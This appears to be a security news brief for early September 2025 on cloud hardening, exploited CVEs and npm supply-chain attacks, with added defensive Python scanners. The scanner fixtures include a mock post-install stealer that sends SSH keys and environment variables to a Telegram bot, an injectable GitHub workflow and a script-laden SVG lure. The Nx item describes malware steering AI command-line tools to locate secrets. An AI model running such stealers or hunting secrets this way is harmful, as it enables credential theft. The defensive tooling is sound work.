Cybersecurity Brief

Cloud Hardening, CVEs Under Attack, and Supply‑Chain Threats

Coverage: 05 Sept 2025 – 07 Sept 2025 (UTC)

Cloud platforms emphasized preventive controls while defenders faced urgent patching. AWS enabled hybrid post‑quantum key establishment by default for CloudFront and added a TLS 1.3‑only viewer policy, and Microsoft set October 2025 for Phase 2 of mandatory MFA across Azure Resource Manager operations. At the same time, a maximum‑severity flaw in Argo CD, reported by BleepingComputer, and active exploitation of SAP S/4HANA, detailed by The Hacker News, highlighted the patching backlog.

Cloud edge, identity, and detection tighten

AWS is pushing defense forward at the edge. CloudFront now supports hybrid post‑quantum key establishment on client‑to‑edge TLS by default, and a new TLS1.3_2025 policy can enforce modern protocol use. The move reduces friction for adoption—no added cost—and lets teams future‑proof in‑transit encryption while validating viewer compatibility where strict TLS 1.3 is required. In parallel, GuardDuty expanded custom intelligence beyond IPs with entity lists for domains and combined IP/domain indicators; detections can now trigger on domain activity and suppression lists can reduce alert noise, easing multi‑Region operations. See AWS for details.
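Before moving a distribution to the TLS1.3_2025 policy it is worth measuring how much viewer traffic still negotiates TLS 1.2 or older, and from which clients. The following is an added example, not AWS code: it parses CloudFront standard (W3C) access logs using the `#Fields:` header the service writes, so it is independent of column order, and summarises negotiated protocol versions and the user agents that would be cut off by a TLS 1.3‑only policy. The log lines are constructed samples with an abbreviated field list; real logs carry more columns and are gzip'd.

```python
"""Viewer TLS audit over CloudFront standard (W3C) access logs (added example, not AWS code)."""
from collections import Counter
from urllib.parse import unquote

# Abbreviated header; real logs list ~33 fields, the parser keys on whatever the header names.
FIELDS = ("date time x-edge-location sc-bytes c-ip cs-method cs(Host) "
          "cs-uri-stem sc-status cs(User-Agent) cs-protocol ssl-protocol ssl-cipher")

# Constructed sample rows (tab-separated; user agents are URL-encoded as in real logs).
_ROWS = [
    ["2025-09-05", "10:00:01", "IAD12-C1", "1024", "203.0.113.10", "GET", "d111.cloudfront.net",
     "/index.html", "200", "Mozilla/5.0%20(Windows%20NT%2010.0)", "https", "TLSv1.3", "TLS_AES_128_GCM_SHA256"],
    ["2025-09-05", "10:00:02", "IAD12-C1", "2048", "198.51.100.7", "GET", "d111.cloudfront.net",
     "/app.js", "200", "Mozilla/5.0%20(Macintosh)", "https", "TLSv1.3", "TLS_AES_256_GCM_SHA384"],
    ["2025-09-05", "10:00:03", "FRA50-C2", "512", "192.0.2.44", "GET", "d111.cloudfront.net",
     "/api/v1/ping", "200", "LegacyAgent/1.0", "https", "TLSv1.2", "ECDHE-RSA-AES128-GCM-SHA256"],
    ["2025-09-05", "10:00:04", "FRA50-C2", "768", "192.0.2.45", "POST", "d111.cloudfront.net",
     "/api/v1/upload", "201", "Mozilla/5.0%20(Windows%20NT%206.1)", "https", "TLSv1.2", "ECDHE-RSA-AES256-GCM-SHA384"],
    ["2025-09-05", "10:00:05", "IAD12-C1", "300", "203.0.113.11", "GET", "d111.cloudfront.net",
     "/health", "301", "curl/8.4.0", "http", "-", "-"],
]
SAMPLE_LOG = "\n".join(["#Version: 1.0", "#Fields: " + FIELDS] + ["\t".join(r) for r in _ROWS])


def parse_cloudfront_log(text: str) -> list[dict]:
    """Turn one log file into dicts keyed by the names in its '#Fields:' line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split("\t")
        if fields is None or len(values) != len(fields):
            raise ValueError(f"row does not match #Fields header: {line[:40]!r}")
        records.append(dict(zip(fields, values)))
    return records


def protocol_breakdown(records: list[dict]) -> Counter:
    """Requests per negotiated TLS version; plain-HTTP rows carry '-' and are skipped."""
    return Counter(r["ssl-protocol"] for r in records if r["ssl-protocol"] != "-")


def legacy_viewers(records: list[dict]) -> Counter:
    """User agents that did not negotiate TLS 1.3; these break under a TLS 1.3-only policy."""
    hits = Counter()
    for r in records:
        if r["ssl-protocol"] not in ("-", "TLSv1.3"):
            hits[unquote(r["cs(User-Agent)"])] += 1
    return hits


def legacy_share(records: list[dict]) -> float:
    """Fraction of HTTPS requests that would fail under TLS1.3_2025 (0.0 when there is no HTTPS traffic)."""
    https = [r for r in records if r["ssl-protocol"] != "-"]
    return (sum(1 for r in https if r["ssl-protocol"] != "TLSv1.3") / len(https)) if https else 0.0


if __name__ == "__main__":
    recs = parse_cloudfront_log(SAMPLE_LOG)
    print(protocol_breakdown(recs), legacy_viewers(recs), f"{legacy_share(recs):.0%}")
```

Run it over a day of real logs (concatenate the decompressed files) and decide whether the legacy share and the agents behind it are acceptable losses before selecting TLS1.3_2025; the hybrid post‑quantum key exchange needs no such check because it is negotiated only with clients that offer it.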

Microsoft will begin Phase 2 enforcement of mandatory MFA for Azure Resource Manager on October 1, 2025, with a gradual rollout. The requirement covers any client performing resource management actions—including Azure CLI, PowerShell, SDKs, REST APIs, and IaC tools—while excluding workload identities such as managed identities and service principals. Administrators should enable MFA ahead of enforcement, test built‑in policy definitions in audit mode to gauge impact, and update clients (Azure CLI 2.76 and Azure PowerShell 14.3 or later) to ensure compatibility; Global Administrators can postpone deadlines if needed.

Operations and troubleshooting also get updates. Google Cloud introduced Gemini Cloud Assist Investigations (public preview) to accelerate root‑cause analysis for Dataproc and Serverless for Apache Spark by correlating logs, Spark UI metrics, configuration, and cross‑product telemetry into role‑aware summaries and recommendations. And for patch governance, AWS added support in Amazon RDS for Microsoft’s latest SQL Server GDRs (2016 SP3, 2017 CU31, 2019 CU32, 2022 CU20), addressing CVE‑listed issues; teams should snapshot, validate in staging, and schedule upgrades within maintenance windows.

Critical flaws and active exploitation

A CVSS 10.0 issue in Argo CD (CVE‑2025‑55190) allows API tokens with project‑level get permissions to retrieve sensitive repository credentials via the project details endpoint. The vulnerability undermines isolation controls and increases risk that low‑privilege tokens expose usernames and passwords, enabling cloning of private repositories and potential supply‑chain manipulation. Fixes are available in versions 3.1.2, 3.0.14, 2.14.16, and 2.13.9; administrators should upgrade promptly, audit token scopes, consider rotating repository credentials, and review recent access for misuse, per BleepingComputer.
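Two checks a practitioner would run for this issue, as an added example rather than Argo CD project code: whether a running version sits at or above the fixed release for its line, and which project‑scoped RBAC roles hold `get` on the `projects` resource, the permission the report says suffices to read repository credentials through the project details endpoint. The fixed‑version table is the one listed above; the policy text is a constructed sample in Argo CD's `policy.csv` syntax, and release lines with no fix listed return `None` so they are verified by hand rather than silently treated as safe.

```python
"""Version and RBAC checks for CVE-2025-55190 (added example, not Argo CD project code)."""
import re

# Fixed releases per line, from the advisory; lines not listed here return None.
FIXED_IN = {(2, 13): (2, 13, 9), (2, 14): (2, 14, 16), (3, 0): (3, 0, 14), (3, 1): (3, 1, 2)}


def parse_version(v: str) -> tuple:
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:[-+].*)?", v.strip())
    if not m:
        raise ValueError(f"not a semver release: {v!r}")
    return tuple(int(x) for x in m.groups())


def patched_for_cve_2025_55190(version: str):
    """True/False for the four lines with published fixes; None when the line has no fix listed."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    return None if fixed is None else v >= fixed


def project_roles_with_projects_get(policy_csv: str) -> list:
    """(subject, project) pairs for 'p' rules that allow 'get' (or '*') on the 'projects' resource.

    Rule syntax: p, <subject>, <resource>, <action>, <object>, <effect>
    """
    hits = []
    for raw in policy_csv.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split(",")]
        if parts[0] != "p" or len(parts) < 6:
            continue
        subject, resource, action, obj, effect = parts[1:6]
        if resource == "projects" and action in ("get", "*") and effect == "allow":
            hits.append((subject, obj))
    return hits


# Constructed sample: a CI role that was granted project 'get' alongside sync rights.
SAMPLE_POLICY = """\
# project roles for the 'payments' AppProject
p, proj:payments:ci-deployer, applications, sync, payments/*, allow
p, proj:payments:ci-deployer, projects, get, payments, allow
p, proj:payments:viewer, applications, get, payments/*, allow
g, alice, proj:payments:viewer
"""

if __name__ == "__main__":
    for v in ("v3.1.1", "3.1.2", "2.13.8", "2.12.3"):
        print(v, patched_for_cve_2025_55190(v))
    print(project_roles_with_projects_get(SAMPLE_POLICY))
```

Any role the second check returns had, on an unpatched server, read access to every repository credential in its project, so the tokens minted for it belong on the rotation list regardless of whether misuse is found in the logs.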

Exploitation is underway against SAP S/4HANA (CVE‑2025‑42957, CVSS 9.9), where a command‑injection flaw exposed via RFC permits arbitrary ABAP code execution with low‑privileged accounts. Observed attacks can yield full system compromise—creation of SAP_ALL superusers, database modification, password hash exfiltration, and business process tampering. Mitigations include immediate patching from SAP’s August updates, monitoring for suspicious RFC activity and new administrative users, enforcing network segmentation and backups, implementing SAP UCON to restrict RFC use, and auditing access to authorization object S_DMIS activity 02, according to The Hacker News.

The U.S. CISA directed agencies to update Sitecore by September 25, 2025, following active exploitation of a critical deserialization bug (CVE‑2025‑53690). Attackers abused default or publicly exposed ASP.NET machine keys—some from older deployment guides—to conduct ViewState deserialization and deploy a reconnaissance payload (WEEPSTEEL), then moved to privilege escalation and Active Directory abuse. Guidance includes rotating machine keys, hardening configurations, removing public exposure, and performing comprehensive compromise assessments; new deployments auto‑generate unique keys, per The Hacker News. Why it matters: reliance on sample or shared keys turns configuration debt into remote code execution risk.
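The remediation that matters most here is replacing shared or sample machine keys with unique random ones. The following is an added example, not Sitecore or Microsoft code: it audits the `<machineKey>` element of a web.config against a set of known‑sample values the operator supplies, flags ViewState MAC being disabled and obsolete algorithms, and rewrites the element with fresh keys sized for HMACSHA256 (64 bytes) and AES (32 bytes). The web.config and the "sample key" values are constructed placeholders, not the keys from any real deployment guide.

```python
"""Audit and rotate the ASP.NET <machineKey> in a web.config (added example, not Sitecore/Microsoft code)."""
import re
import secrets
import xml.etree.ElementTree as ET

HEX = re.compile(r"^[0-9A-Fa-f]+$")
MIN_HEX = {"validationKey": 40, "decryptionKey": 32}   # documented minimums (SHA1 MAC, AES-128)


def generate_machine_key() -> dict:
    return {
        "validationKey": secrets.token_bytes(64).hex().upper(),  # 128 hex chars for HMACSHA256
        "decryptionKey": secrets.token_bytes(32).hex().upper(),  # 64 hex chars = AES-256
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def audit_machine_key(web_config_xml: str, known_sample_keys: set) -> list:
    """Problem codes for the configuration; an empty list means nothing obvious is wrong."""
    root = ET.fromstring(web_config_xml)
    problems = []
    pages = root.find("system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        problems.append("viewstate-mac-disabled")
    node = root.find("system.web/machineKey")
    if node is None:
        return problems  # absent element: ASP.NET auto-generates keys per machine
    samples = {k.upper() for k in known_sample_keys}
    for attr, minimum in MIN_HEX.items():
        value = node.get(attr, "")
        if value.upper() in samples:
            problems.append(f"sample-{attr}")
        elif value and not value.startswith("AutoGenerate") and (not HEX.match(value) or len(value) < minimum):
            problems.append(f"short-{attr}")
    if node.get("validation", "").upper() == "MD5":
        problems.append("weak-validation-algorithm")
    if node.get("decryption", "").upper() in ("DES", "3DES"):
        problems.append("weak-decryption-algorithm")
    return problems


def rotate_machine_key(web_config_xml: str) -> str:
    """Return the config with <system.web><machineKey> replaced by freshly generated keys."""
    root = ET.fromstring(web_config_xml)
    system_web = root.find("system.web")
    if system_web is None:
        system_web = ET.SubElement(root, "system.web")
    node = system_web.find("machineKey")
    if node is None:
        node = ET.SubElement(system_web, "machineKey")
    node.attrib.clear()  # drop old keys and any AutoGenerate/IsolateApps modifiers
    node.attrib.update(generate_machine_key())
    return ET.tostring(root, encoding="unicode")


# Constructed placeholders standing in for keys copied from an old deployment guide.
SAMPLE_KEYS_FROM_OLD_GUIDES = {"0123456789ABCDEF" * 4, "0123456789ABCDEF" * 2}
SAMPLE_WEB_CONFIG = f"""<configuration>
  <system.web>
    <pages enableViewStateMac="false" />
    <machineKey validationKey="{'0123456789ABCDEF' * 4}" decryptionKey="{'0123456789ABCDEF' * 2}"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    print(audit_machine_key(SAMPLE_WEB_CONFIG, SAMPLE_KEYS_FROM_OLD_GUIDES))
    print(audit_machine_key(rotate_machine_key(SAMPLE_WEB_CONFIG), SAMPLE_KEYS_FROM_OLD_GUIDES))
```

Rotation invalidates every ViewState and forms‑authentication ticket issued under the old keys, which is the point; in a web farm every node must receive the same new values, and the old keys should be treated as compromised credentials for the compromise assessment that follows.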

Supply‑chain abuse and evasive lures

Between August 26 and 31, attackers weaponized a flawed GitHub Actions workflow in the Nx repository to publish a malicious npm release containing a post‑install backdoor that stole tokens, SSH keys, .env files, and crypto wallets—then exfiltrated data to public “s1ngularity‑repository” projects. Notably, the malware leveraged installed AI CLI tools to craft prompts that helped locate secrets, with iterations showing role‑prompting and occasional refusals. A review attributed impact to 2,180 accounts and 7,200 repositories across three phases; mitigations included removing packages, revoking tokens, enforcing two‑factor authentication, adopting npm’s Trusted Publisher model, and adding manual approvals for PR‑triggered workflows, per BleepingComputer.
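The workflow weakness behind this incident is a general pattern: a `pull_request_target` job, which runs with the base repository's secrets, that checks out the contributor's code or pastes contributor‑controlled fields into a shell step. The following is an added example, not Nx or GitHub code: a text‑level linter (deliberately not a YAML parser, so it needs no third‑party library) that flags that trigger, a checkout of the PR head under it, and untrusted `${{ ... }}` expressions interpolated into `run:` scripts. The workflow below is a constructed reproduction of the pattern, not the repository's actual file.

```python
"""Heuristic GitHub Actions workflow audit (added example, not Nx or GitHub tooling)."""
import re

# Expressions a fork contributor controls; inside a `run:` script they become shell code.
UNTRUSTED = re.compile(
    r"\$\{\{\s*(github\.head_ref|github\.event\.(?:pull_request\.(?:title|body|head\.(?:ref|label))"
    r"|issue\.(?:title|body)|comment\.body|review\.body|head_commit\.message))\s*\}\}"
)
PR_HEAD_CHECKOUT = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}")


def run_script_lines(text: str):
    """Yield (lineno, line) for every line that is part of a `run:` script, inline or block scalar."""
    block_indent = None
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if block_indent is not None:
            if stripped and indent <= block_indent:
                block_indent = None          # dedent ends the block scalar
            else:
                if stripped:
                    yield lineno, line
                continue
        m = re.match(r"(-\s*)?run:\s*(.*)$", stripped)
        if not m:
            continue
        if m.group(2).strip() in ("|", "|-", "|+", ">", ">-", ">+", ""):
            block_indent = indent + len(m.group(1) or "")   # indent of the `run` key itself
        else:
            yield lineno, line


def audit_workflow(text: str) -> list:
    findings = []
    if re.search(r"\bpull_request_target\b", text):
        findings.append("pull_request_target: job runs with the base repository's secrets and write token")
        if PR_HEAD_CHECKOUT.search(text):
            findings.append("checks out the PR head under pull_request_target: fork code executes with those secrets")
    for lineno, line in run_script_lines(text):
        m = UNTRUSTED.search(line)
        if m:
            findings.append(f"line {lineno}: ${{{{ {m.group(1)} }}}} interpolated into a shell step (command injection)")
    return findings


# Constructed workflow reproducing the risky pattern (not any real repository's file).
RISKY_WORKFLOW = """\
name: pr-check
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Validate title
        run: |
          echo "Checking ${{ github.event.pull_request.title }}"
          ./scripts/check.sh
      - name: Safe use of the same value
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: echo "$TITLE"
"""
# Hardened variant: plain pull_request trigger, untrusted value only reaches the shell via an env var.
SAFE_WORKFLOW = RISKY_WORKFLOW.replace("pull_request_target:", "pull_request:").replace(
    '          echo "Checking ${{ github.event.pull_request.title }}"\n', "")

if __name__ == "__main__":
    for f in audit_workflow(RISKY_WORKFLOW):
        print("-", f)
    print("hardened:", audit_workflow(SAFE_WORKFLOW))
```

The third finding is the one the first two amplify: passing the title through `env:` and quoting `"$TITLE"` keeps it data, whereas interpolating it into the script makes it code that runs with whatever the trigger granted.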

Supply‑chain risks also surfaced in the npm ecosystem. Socket researchers found four malicious packages impersonating Flashbots tooling that steal Ethereum private keys and mnemonic phrases, with one library exfiltrating environment variables over SMTP and redirecting unsigned transactions to attacker addresses while remaining functionally plausible. Others exfiltrate seed phrases to a Telegram bot and provide modular data theft mechanics. The packages were still available at analysis time, underscoring the need to vet package provenance and scrutinize code paths that handle secrets, according to The Hacker News.
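Both of the npm stories above reduce to two questions a reviewer can ask of a package before installing it: does anything run automatically at install time, and does any file read secrets and also talk to the network? The following is an added example, not npm or Socket tooling, and it covers both the post‑install backdoor described for Nx and the key‑stealing Flashbots look‑alikes: it lists lifecycle hooks from package.json and scans sources for secret reads (environment, SSH keys, `.env`, wallet mnemonics) next to an outbound sink (Telegram bot API, SMTP via nodemailer, HTTP requests). The package contents are constructed samples, not the real malicious packages, and the patterns are heuristics that will need tuning for a given code base.

```python
"""npm package triage: install hooks plus secret-read/exfil co-occurrence (added example, not npm or Socket code)."""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SECRET_READS = re.compile(
    r"process\.env\b|\.ssh/|id_(?:rsa|ed25519|ecdsa)\b|\.env\b|\.npmrc\b|"
    r"\bmnemonic\b|\bseed ?phrase\b|\bprivateKey\b|\.config/gh/hosts\.yml",
    re.I,
)
EXFIL_SINKS = re.compile(
    r"api\.telegram\.org/bot|nodemailer|createTransport\(|\bsmtp\b|"
    r"https?\.request\(|\bfetch\(|axios\.(?:post|put)\(",
    re.I,
)


def install_hooks(package_json: str) -> dict:
    """Lifecycle scripts that run automatically when the package is installed."""
    scripts = json.loads(package_json).get("scripts", {}) or {}
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def triage_source(src: str) -> dict:
    """Distinct secret-read and exfil-sink tokens found in one source file."""
    return {
        "secret_reads": sorted({m.group(0).lower() for m in SECRET_READS.finditer(src)}),
        "exfil_sinks": sorted({m.group(0).lower() for m in EXFIL_SINKS.finditer(src)}),
    }


def triage_package(package_json: str, files: dict) -> list:
    """Findings for a package given its package.json text and a {filename: source} map."""
    findings = []
    hooks = install_hooks(package_json)
    for hook, cmd in hooks.items():
        findings.append(f"install hook {hook}: {cmd}")
    for name, src in files.items():
        t = triage_source(src)
        if t["secret_reads"] and t["exfil_sinks"]:
            findings.append(f"{name}: reads {t['secret_reads']} and sends via {t['exfil_sinks']}")
        if hooks and any(name in cmd for cmd in hooks.values()) and t["exfil_sinks"]:
            findings.append(f"{name}: network activity inside an install hook")
    return findings


# Constructed samples: a package with a post-install stealer, and a clean one.
BACKDOORED_PKG_JSON = json.dumps({
    "name": "example-build-tool", "version": "1.0.1",
    "scripts": {"postinstall": "node telemetry.js", "test": "jest"},
})
BACKDOORED_FILES = {
    "telemetry.js": (
        "const fs = require('fs'), os = require('os');\n"
        "const keys = fs.readFileSync(os.homedir() + '/.ssh/id_rsa', 'utf8');\n"
        "const env = JSON.stringify(process.env);\n"
        "fetch('https://api.telegram.org/bot000:TOKEN/sendMessage', {method: 'POST', body: keys + env});\n"
    ),
    "index.js": "module.exports = { build: () => 'ok' };\n",
}
CLEAN_PKG_JSON = json.dumps({"name": "tidy-lib", "version": "2.0.0", "scripts": {"test": "node test.js"}})
CLEAN_FILES = {"index.js": "module.exports = (a, b) => a + b;\n"}

if __name__ == "__main__":
    for f in triage_package(BACKDOORED_PKG_JSON, BACKDOORED_FILES):
        print("-", f)
    print("clean:", triage_package(CLEAN_PKG_JSON, CLEAN_FILES))
```

Installing with `npm install --ignore-scripts` and running this over the unpacked tarball first costs seconds; the findings it produces are a prompt to read the flagged file, not a verdict, because a legitimate mailer library will also match the SMTP sink.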

Phishing tradecraft continued to blend content and behavior. VirusTotal’s AI Code Insight support for SVGs uncovered a campaign hiding JavaScript inside SVG files to render a fake Colombian judicial portal, luring victims to download a password‑protected ZIP. Executing a renamed legitimate browser sideloaded a malicious DLL, enabling follow‑on payloads. The feature expansion led to 523 additional SVGs being identified from the same campaign that had evaded signature‑based tools, per BleepingComputer. The takeaway: inspect vector formats and combine behavioral analysis with content inspection to surface embedded scripts.
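The content‑inspection half of that takeaway is mechanical enough to automate. The following is an added example, not VirusTotal code: it walks an SVG's XML tree for `<script>` elements, `on*` event handlers, `javascript:` hrefs and `<foreignObject>`, all of which let an SVG execute or render arbitrary content when opened in a browser, and then base64‑decodes long runs of base64 text and reports any that decode to HTML, the technique this campaign used to hide the fake portal. The SVG it scans is a constructed, harmless stand‑in for the campaign's files.

```python
"""Static triage of SVG files for embedded script and smuggled HTML (added example, not VirusTotal code)."""
import base64
import re
import xml.etree.ElementTree as ET

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
HTML_MARKER = re.compile(rb"<(?:html|body|script|iframe|form)\b", re.I)


def scan_svg(data: bytes) -> list:
    """(finding_kind, snippet) pairs; an empty list means no active content was found."""
    findings = []
    root = ET.fromstring(data)
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()          # strip the namespace
        if tag == "script":
            findings.append(("script", (el.text or "").strip()[:60]))
        elif tag == "foreignobject":
            findings.append(("foreignObject", ""))
        for name, value in el.attrib.items():
            local = name.rsplit("}", 1)[-1].lower()
            if local.startswith("on"):
                findings.append((f"event-handler:{local}", value[:60]))
            elif local == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(("javascript-href", value[:60]))
    text = data.decode("utf-8", "replace")
    for blob in B64_RUN.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:                                 # binascii.Error is a ValueError
            continue
        if HTML_MARKER.search(decoded):
            findings.append(("base64-html", decoded[:60].decode("utf-8", "replace")))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_svg(data))


# Constructed lure: a base64 HTML page written into the document by an onload handler.
FAKE_PORTAL_HTML = b"<html><body><h1>Portal</h1><script>location='https://example.invalid/x.zip'</script></body></html>"
SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1" onload="run()">
  <script><![CDATA[
    var p = "{base64.b64encode(FAKE_PORTAL_HTML).decode()}";
    function run() {{ document.write(atob(p)); }}
  ]]></script>
</svg>""".encode()
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for kind, snippet in scan_svg(SAMPLE_SVG):
        print(kind, "->", snippet)
    print("benign:", scan_svg(BENIGN_SVG))
```

Real samples add obfuscation and junk code on top of this, which is why the behavioral half matters too; but any SVG arriving by email that carries a script element or an event handler at all is already worth quarantining, since a legitimate icon or diagram needs neither.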

These and other news items from the coverage period:

Fri, September 5, 2025

Max Severity Argo CD API Flaw Exposes Repo Credentials

🔒 A critical Argo CD vulnerability (CVE-2025-55190) allows API tokens with even low project-level get permissions to access API endpoints and retrieve repository credentials. Rated CVSS v3 10.0, the flaw bypasses isolation protections and can expose usernames and passwords used to access Git repositories. Unpatched releases in the 2.13, 2.14, 3.0, and 3.1 lines are affected; fixes shipped in 2.13.9, 2.14.16, 3.0.14, and 3.1.2, and administrators should upgrade immediately.

Fri, September 5, 2025

Amazon CloudFront Adds Post-Quantum and TLS1.3 Policy

🔐 Amazon CloudFront now supports hybrid post-quantum key establishment across all existing TLS security policies for client-to-edge connections, enabling quantum-resistant key exchange without customer configuration. CloudFront also introduces a new TLS1.3_2025 security policy that accepts TLS 1.3 only. Post-quantum key establishment is enabled by default, the TLS1.3_2025 policy is selected per distribution, and both are available at all edge locations at no additional charge. These updates help organizations strengthen long-term in-transit protection and simplify compliance planning.

Fri, September 5, 2025

Azure Phase 2: Mandatory MFA for Resource Management

🔒 Microsoft is starting Phase 2 of mandatory multi-factor authentication for Azure resource management operations on October 1, 2025. Enforcement at the Azure Resource Manager layer will be applied gradually via Azure Policy, requiring users to complete MFA before performing management actions. Workload identities (managed identities and service principals) are not affected. Administrators should enable MFA, test policy in audit mode, and ensure Azure CLI 2.76 and Azure PowerShell 14.3 or later are in use for best compatibility.

Fri, September 5, 2025

Amazon GuardDuty Adds Custom Entity Lists for Detection

🛡️ AWS announced general availability of Amazon GuardDuty custom threat detection using entity lists, expanding support beyond legacy IP-only lists to include domains and mixed IP/domain lists. The service adds a new finding type, Impact:EC2/MaliciousDomainRequest.Custom, when activity involves a listed domain. Entity lists can also be used to suppress alerts from trusted sources, and they simplify permissions and cross-region management. The capability is available in all Regions where GuardDuty runs, excluding China and GovCloud (US).

Fri, September 5, 2025

Gemini Cloud Assist for Dataproc: Troubleshoot Apache Spark

🛠️ Gemini Cloud Assist Investigations is now in public preview to help troubleshoot Dataproc and Serverless for Apache Spark workloads by automatically analyzing driver and executor logs, Spark UI metrics, configurations, and cross-product telemetry. Accessible from the Google Cloud console and via API, it produces prioritized summaries and clear remediation steps. The tool is tailored to data engineers, data scientists, SREs, and managers to reduce investigation time and accelerate fixes.

Fri, September 5, 2025

Critical SAP S/4HANA Command Injection (CVE-2025-42957)

⚠️ SAP patched a critical command injection in SAP S/4HANA tracked as CVE-2025-42957 (CVSS 9.9) that allows low-privileged users to inject arbitrary ABAP via an RFC-exposed function module, bypassing authorization checks. SecurityBridge and NVD report active exploitation affecting both on-premise and Private Cloud editions, with potential for full system compromise. Organizations are urged to apply SAP's monthly fixes immediately, monitor for suspicious RFC calls or new admin accounts, implement network segmentation and backups, adopt SAP UCON to restrict RFC usage, and review access to authorization object S_DMIS activity 02.

Fri, September 5, 2025

CISA Orders Immediate Patch for Critical Sitecore Flaw

🔒 CISA has ordered immediate patching of a critical deserialization vulnerability in Sitecore (CVE-2025-53690), rated 9.0, after active exploitation was observed. The flaw arises from exposed ASP.NET machine keys—some copied from older deployment guides—and allows ViewState deserialization that leads to remote code execution. Agencies must rotate machine keys, harden configurations, and scan for compromise indicators by September 25, 2025, to mitigate further intrusions.

Sat, September 6, 2025

AI-powered Nx malware exposes 2,180 GitHub accounts

🔒 A backdoored NPM package published from the Nx repository delivered a post-install credential stealer named telemetry.js, which targeted Linux and macOS systems for GitHub and npm tokens, SSH keys, .env files and crypto wallets. The malware exfiltrated harvested secrets to public repositories named s1ngularity-repository. Attackers unusually used AI CLI tools (Claude, Q, Gemini) to run tuned LLM prompts for better credential harvesting. Nx and GitHub removed the packages, revoked tokens, and implemented 2FA, tokenless publishing and manual PR approvals.

Fri, September 5, 2025

Critical S/4HANA Code Injection Flaw Actively Exploited

⚠️ SAP released a patch for a critical S/4HANA vulnerability, CVE-2025-42957 (CVSS 9.9), after researchers observed a live exploit that allows low-privilege ABAP code injection and full system takeover. The flaw affects all S/4HANA deployments, including private cloud and on-premises, and can be weaponized easily because ABAP source is publicly viewable. Administrators should apply the update immediately and review account privileges, default credentials, encryption settings, and monitoring to limit risks such as data tampering, account creation with SAP_ALL, and password-hash exfiltration.

Fri, September 5, 2025

Critical SAP S/4HANA Code Injection Flaw Actively Exploited

⚠️ A critical ABAP code injection flaw, tracked as CVE-2025-42957, in an RFC-exposed function of SAP S/4HANA is being exploited in the wild to breach exposed servers. The bug allows low-privileged authenticated users to inject arbitrary code, bypass authorization checks, and take full control of affected systems. SAP issued a fix on August 11, 2025 (CVSS 9.9), but SecurityBridge reports active, limited exploitation and urges immediate patching.

Fri, September 5, 2025

Critical SAP S/4HANA Code Injection Exploit Active

⚠️ A critical code injection vulnerability in SAP S/4HANA (CVE-2025-42957, CVSS 9.9) is being actively exploited in the wild, researchers warn. The flaw allows a low-privileged user to inject ABAP code and gain full system and operating system access across all S/4HANA releases. SecurityBridge confirmed practical abuse and noted the exploit was straightforward to develop because ABAP code is openly viewable. Organizations that have not yet applied the August 11 patch should install it immediately to prevent complete data compromise and unauthorized administrative access.

Sat, September 6, 2025

Malicious npm Packages Impersonate Flashbots, Steal Keys

🔑 Researchers found four malicious npm packages impersonating Flashbots and common cryptographic utilities to harvest Ethereum wallet credentials. Uploaded by user "flashbotts" between September 2023 and August 19, 2025, the libraries exfiltrate private keys and mnemonic seed phrases to a Telegram bot and transmit environment data via Mailtrap SMTP. One package also redirects unsigned transactions to an attacker-controlled wallet.

Fri, September 5, 2025

Germany Charges Hacker Over Rosneft Deutschland Cyberattack

⚠️ A 30-year-old man has been charged for a March 2022 cyberattack on Rosneft Deutschland that reportedly stole and deleted about 20 TB of data, leaving a 'Glory to Ukraine' message. Prosecutors allege the breach exposed backups, virtual machines, mail server images and device backups, prompting remote wipes and nearly €12.4M in combined losses. Authorities charged him with computer sabotage, data alteration, and data espionage.

Fri, September 5, 2025

TAG-150 Develops CastleRAT: Python and C Variants Now

🛡️ Recorded Future links the activity of TAG-150 to a new remote access trojan, CastleRAT, available in both Python and C variants that collect system data, fetch additional payloads, and execute commands via CMD and PowerShell. The Python build is tracked as PyNightshade, while eSentire and others refer to related tooling as NightshadeC2. Researchers observed Steam-profile dead drops, a multi-tiered C2 layout, and distribution through CastleLoader-assisted phishing and fake GitHub repositories. Operators use Cloudflare-themed "ClickFix" lures and deceptive domains to deliver loaders and downstream stealers and RATs.

Fri, September 5, 2025

South Carolina School District Data Breach Affects 31,000

🔒 School District Five of Lexington & Richland Counties disclosed a June 3 network intrusion that may have exposed personal data for 31,475 current and former students and staff. Exposed information likely includes names, dates of birth, Social Security numbers, financial account details and state‑issued ID information. The district engaged independent cybersecurity experts and determined files were taken; the incident was claimed by Interlock. Affected individuals are being offered Single Bureau Credit Monitoring and $1m in identity theft insurance through CyberScout.

Sun, September 7, 2025

ChatGPT makes Projects free, adds chat-branching toggle

